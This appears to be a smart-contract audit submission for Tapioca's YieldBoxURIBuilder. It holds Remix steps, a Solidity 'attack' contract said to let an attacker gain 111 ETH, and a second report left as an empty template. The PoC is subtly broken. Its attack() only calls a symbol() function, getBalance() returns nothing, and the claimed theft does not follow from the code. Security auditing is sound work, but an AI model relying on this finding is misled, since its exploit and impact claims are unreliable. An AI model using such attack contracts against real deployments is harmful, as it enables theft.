Detailed description of the impact of this finding.
This call is executed following another call within the same transaction. It is possible that the call never gets executed if a prior call fails permanently. This might be caused intentionally by a malicious callee.
Proof of Concept
Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.
NB: Using Remix Dev Foundry Deployment
1. switch to first account (as alice) and deploy the victim contract.
2. switch to second account (as eve) and deploy the attack contract.
3. switch to first account (as alice) and select 111 ETH and enter address and string values and click symbol() button.
4. switch to second account (as eve) and select 111 ETH and paste victim contract address for alice in input box next to button for attack() and then click attack() button.
5. in account 2 for eve, click getbalance button and balance is +111 ETH.
PoC
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;
import "/2023-07-tapioca/tap-token-audit/node_modules/@openzeppelin/contracts/utils/Strings.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/Base64.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/BoringERC20.sol";
import "./interfaces/IYieldBox.sol";
import "./NativeTokenFactory.sol";
import "./YieldBoxURIBuilder.sol";
import "/2023-07-tapioca/YieldBox/contracts/enums/YieldBoxTokenType.sol";
import "/2023-07-tapioca/YieldBox/contracts/interfaces/IStrategy.sol";
contract AttackYieldBoxURIBuilder is YieldBoxURIBuilder {
YieldBoxURIBuilder public yieldboxuribuilder;
constructor(YieldBoxURIBuilder _yieldboxuribuilder) {
yieldboxuribuilder = YieldBoxURIBuilder(_yieldboxuribuilder);
}
function attack() public payable {
yieldboxuribuilder.symbol(Asset(TokenType(1), address(yieldboxuribuilder), IStrategy(address(yieldboxuribuilder)), 111), "ETH");
}
function getBalance() public payable {
address(this).balance;
}
}
Tools Used
Mythx
Visual Studio Code
Foundry
Remix IDE
Recommended Mitigation Steps
If possible, refactor the code such that each transaction only executes one external call or make sure that all callees can be trusted (i.e. they're part of your own codebase).
Lines of code
https://github.com/Tapioca-DAO/YieldBox/blob/f5ad271b2dcab8b643b7cf622c2d6a128e109999/contracts/YieldBoxURIBuilder.sol#L59
Vulnerability details
Impact
Detailed description of the impact of this finding.
Proof of Concept
Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.
Vulnerable File
Vulnerable URL
Vulnerable code
Dos Test Case
PoC
Tools Used
Recommended Mitigation Steps
Assessed type
DoS